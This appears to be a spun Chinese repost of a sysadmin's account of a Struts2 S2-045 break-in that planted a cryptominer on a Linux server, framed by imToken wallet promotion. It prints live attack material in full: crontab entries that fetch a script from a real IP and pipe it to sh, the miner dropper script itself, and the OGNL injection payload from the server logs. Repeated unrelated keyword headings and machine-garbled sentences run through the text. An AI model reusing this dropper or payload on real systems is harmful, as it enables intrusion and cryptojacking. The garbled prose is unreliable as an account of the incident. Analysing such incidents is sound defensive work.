主页 > imtoken如何安装 > 我被抓到做比特币矿工

我被抓到做比特币矿工

imtoken如何安装 2023-01-16 21:41:58

介绍

109211-20170920131351025-989665250.jpg

世界上还是有很多伟大的人。2011年,一名三年级学生陷入困境。后来在知乎上,有人向手头有6000元的三年级学生发了一个问题。有什么好的理财投资建议?今天去知乎上的热门问题挖比特币会判刑吗,因为在问题下面,有一个获得了几万点赞的回答“买比特币,保存钱包文件,然后忘记你有6000块钱,看看五年后。”

原因

我是服务器,也是内网的Linux服务器。我外面有天青汉马防火墙,里面有防火墙。我有一个强密码组合。我什至不记得确切的位数。这几年我过得很悠闲。,悠然觉得自己有些乱七八糟,但还是被这种世俗的冷漠无情地攻击。

109211-20170920153256290-436597457.jpg

那天一大早,我的大脑有些发烫,于是我连忙下达了一个最高命令:

top - 20:07:49 up 70 days,  8:53,  2 users,  load average: 5.71, 5.07, 2.93
Tasks: 200 total,   1 running, 199 sleeping,   0 stopped,   0 zombie
%Cpu(s): 50.2 us,  0.1 sy,  0.0 ni, 49.7 id,  0.0 wa,  0.0 hi,  0.0 si,  0.0 st
KiB Mem : 65401524 total, 36266252 free, 13198040 used, 15937232 buff/cache
KiB Swap: 32834556 total, 32803700 free,    30856 used. 51442368 avail Mem 
  PID USER      PR  NI    VIRT    RES    SHR S  %CPU %MEM     TIME+ COMMAND
17257 root      20   0  591340  15220    556 S 599.7  0.0  67:13.74 atd
15768 root      20   0 15.369g 2.319g  18048 S   1.7  3.7   4:10.49 java

挖比特币是什么意思_比特币和莱特币能同时挖吗_挖比特币会判刑吗

发现一个奇怪的进程atd,CPU使用率接近600%,执行命令ps -eaf|grep atd:

[root@itstyle tmp]# ps -ef|grep atd
root     17257     1 99 19:56 ?        01:22:31 ./atd -c trtgsasefd.conf -t 6
root     17475 17165  0 20:10 pts/0    00:00:00 grep --color=auto atd

然后 find / -name atd 找到相关指令的存放位置。

[root@itstyle tmp]# find / -name atd
/var/tmp/atd

突然觉得还是先杀掉atd进程比较好,杀-9 17257挖比特币会判刑吗,马上又快又强地杀掉。

然后就退烧了,但可恶的是,几分钟之内,又烧了,可见atd的进程又开始运行了。

比特币和莱特币能同时挖吗_挖比特币会判刑吗_挖比特币是什么意思

杀掉后重新运行,肯定是某处有计时,查看计时任务,crontab -l:

[root@itstyle tmp]# crontab -l
*/20 * * * * wget -O - -q http://5.188.87.11/icons/logo.jpg|sh
*/19 * * * * curl http://5.188.87.11/icons/logo.jpg|sh

擦,之前的定时脚本没了,还有两个奇怪的任务。里面有一个特殊的网址。将其复制到浏览器以访问它。本来以为是美女图还是恐怖图,结果竟然是黑色的大图。以下代码实际上存在于其中:

#!/bin/sh
rm -rf /var/tmp/bmsnxvpggm.conf
ps auxf|grep -v grep|grep -v trtgsasefd|grep "/tmp/"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "\./"|grep 'httpd.conf'|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "\-p x"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "stratum"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "cryptonight"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "bmsnxvpggm"|awk '{print $2}'|xargs kill -9
ps -fe|grep -e "trtgsasefd" -e "ixcnkupikm" -e "jmzaazwiom" -e "erlimkvsmb" -e "pdnpiqlnaa" -e "zhoimvmfqo"|grep -v grep
if [ $? -ne 0 ]
then
echo "start process....."
chmod 777 /var/tmp/trtgsasefd.conf
rm -rf /var/tmp/trtgsasefd.conf
curl -o /var/tmp/trtgsasefd.conf http://5.188.87.11/icons/kworker.conf
wget -O /var/tmp/trtgsasefd.conf http://5.188.87.11/icons/kworker.conf
chmod 777 /var/tmp/atd
rm -rf /var/tmp/atd
rm -rf /var/tmp/sshd
cat /proc/cpuinfo|grep aes>/dev/null
if [ $? -ne 1 ]
then
curl -o /var/tmp/atd http://5.188.87.11/icons/kworker
wget -O /var/tmp/atd http://5.188.87.11/icons/kworker
else
curl -o /var/tmp/atd http://5.188.87.11/icons/kworker_na
wget -O /var/tmp/atd http://5.188.87.11/icons/kworker_na
fi
chmod +x /var/tmp/atd
cd /var/tmp
proc=`grep -c ^processor /proc/cpuinfo`
cores=$((($proc+1)/2))
nohup ./atd -c trtgsasefd.conf -t `echo $cores` >/dev/null &
else
echo "runing....."
fi

一堆脚本,三伏天居然还有rm -rf。这要杀了我!!!吓坏了,打开蓝灯在谷歌上搜索这个命令,在virustotal中找到如下指令:

109211-20170919213327056-601818798.png

比特币和莱特币能同时挖吗_挖比特币是什么意思_挖比特币会判刑吗

还发现四天前的评论,这是一个通过struts漏洞传播下载并启动位码挖掘器的脚本。

在gov.lk中也查到了一段代码,隐约发现和struts2有关:

109211-20170919213337196-480886266.png

由于一些老项目还在使用struts2,所以查了相关日志,发现了传说中的OGNL注入。

org.apache.commons.fileupload.FileUploadBase$InvalidContentTypeException: the request doesn't contain a multipart/form-data or multipart/form-data stream, content type header is %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "*/20 * * * * wget -O - -q http://91.230.47.40/icons/logo.jpg|sh\n*/19 * * * * curl http://91.230.47.40/icons/logo.jpg|sh" | crontab -;wget -O - -q http://91.230.47.40/icons/logo.jpg|sh').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

黑客使用表单向struts请求发送一些内容,内容被OGNL解析,结果创建了一个crontab,擦,听听不如看。强迫矿工。

挖比特币会判刑吗_比特币和莱特币能同时挖吗_挖比特币是什么意思

109211-20170919213346446-1831629170.jpg

采矿组织

2010年以来,Struts2安全漏洞与远程代码执行漏洞接连被披露。019、S2-020、S2-032、S2-037、devMode,以及Struts2在2017年3月上旬披露的S045漏洞,每次漏洞爆发,就会出现互联网Struts2扫描攻击活动。

本次攻击针对Struts2的远程命令执行漏洞,漏洞编号:S2-045,CVE编号:CVE​​-2017-5638,官方评级为高风险,该漏洞是由于使用了基于Jakarta插件的文件上传功能,恶意用户可以通过修改HTTP请求头中的Content-Type值来触发该漏洞。黑客对互联网上的WEB应用服务器批量发起攻击,下载恶意脚本执行比特币挖矿程序,主要感染Linux服务器。

109211-20170919213359431-1828586351.jpg

经过测试和搜索,应该是一个有组织、有纪律的矿组。以下是IP地址的来源。

挖比特币是什么意思_比特币和莱特币能同时挖吗_挖比特币会判刑吗

109211-20170919213406368-1488533570.png

解决方案

Struts2已经升级到2.5.10,高危漏洞又来了。这是三月份的升级。届时,投机者应抓紧升级。如果你真的不想升级,也没关系。反正就是挖矿。,不会破坏你的任何东西。

但如果你不是我的,你就是个傻瓜?到时候,就不会发烧那么简单了。很多公司在在线部署方面都不是很规范。也许所有程序都可以用root启动?

如何注入

最后,我觉得这是大家比较关心的问题。想必很多朋友都想知道黑客是怎么注入的?

如果您想查看本帖的隐藏内容,请

人家说只要够诚意,在山的西边找个当铺,进去就能改变人生,但我不知道。开个玩笑,感谢您阅读到最后。祝您阅读愉快,工作顺利。据说留言的程序员都找到了女票!!!

上一篇:疯了!一日暴涨236%,马斯克又火了“shi”币,部分投资人3000元赚了60万元。
下一篇:比特币交易平台关闭消息确凿,监管发现平台被非法交易使用

相关文章

imtoken钱包是imtoken官网旗下产品之一,拥有安卓版本下载、苹果版本下载。imtoken钱包现已更新至2.0、2.5以上版本,imtoken官方为其打造的imtokenapp最新版可供全网端下载。